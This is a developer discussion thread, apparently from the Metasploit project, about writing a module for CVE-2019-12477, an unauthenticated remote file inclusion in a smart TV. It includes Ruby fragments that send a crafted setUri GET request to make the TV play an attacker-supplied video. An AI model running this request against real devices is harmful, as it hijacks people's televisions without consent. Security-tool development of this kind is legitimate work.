Hi all, if I wanted to write a module for CVE-2019-12477, I wanted to understand the working approach of this module, although it's an unauth remote file inclusion in a smart TV. As per my experience, the functionality of the module should be sending a simple crafted request to the smart TV which can broadcast xyz video which is requested by an attacker.
Reference: https://twitter.com/RandomDhiraj/status/1135472207407276032
Could someone please guide me through?
Ping @wvu-r7
smells like some 10hrs of epic sax man on this one. @ccondon-r7 you up to test the module?
Since you need to send a GET request, you'll want to use send_request_cgi from HttpClient. I think you've done this before.
It's probably a good idea to serve the .m3u8 and video files yourself. Since you already have a working PoC, you can reuse the content you already have, assuming compatible licensing. I would use HttpServer to serve the files.
For an idea of where to start, you can take a look at https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_metaprogramming.rb, which uses both the HttpClient and HttpServer libraries.
Hope this helps. Let me know if you have questions.
I am stuck on serving the .m3u8 file. Could you suggest something?
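```ruby
    # Fragment as posted: the tail of the module's initialize method.
    register_options(
      [
        Opt::RPORT(80)
      ])
  end

  def run_host(ip)
    fpath = "" # location of the .m3u8 playlist, left empty in the post
    res = send_request_raw({
      'method' => 'GET',
      'uri' => "/remote/media_control?action=setUri&uri=#{fpath}"
    })
  end
```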
I was providing a full path of the video from the data/ folder but that's a bad idea.
Serve it in on_request_uri from HttpServer. You can reference the full URL with get_uri. See the other module for an example.
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/server.rb
https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-module-using-HttpServer-and-HttpClient
Also, you'll want to use vars_get in your request.
This works so far,
```ruby
  def run
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "/remote/media_control?action=setUri&uri=#{"data/fbroadcast.m3u8"}"
    })
    if res && res.code == 200
      print_good("Fake video was broadcasted")
    else
      print_error("No fake video was broadcasted")
    end
  end
end
```
Closing this, we have completed the task.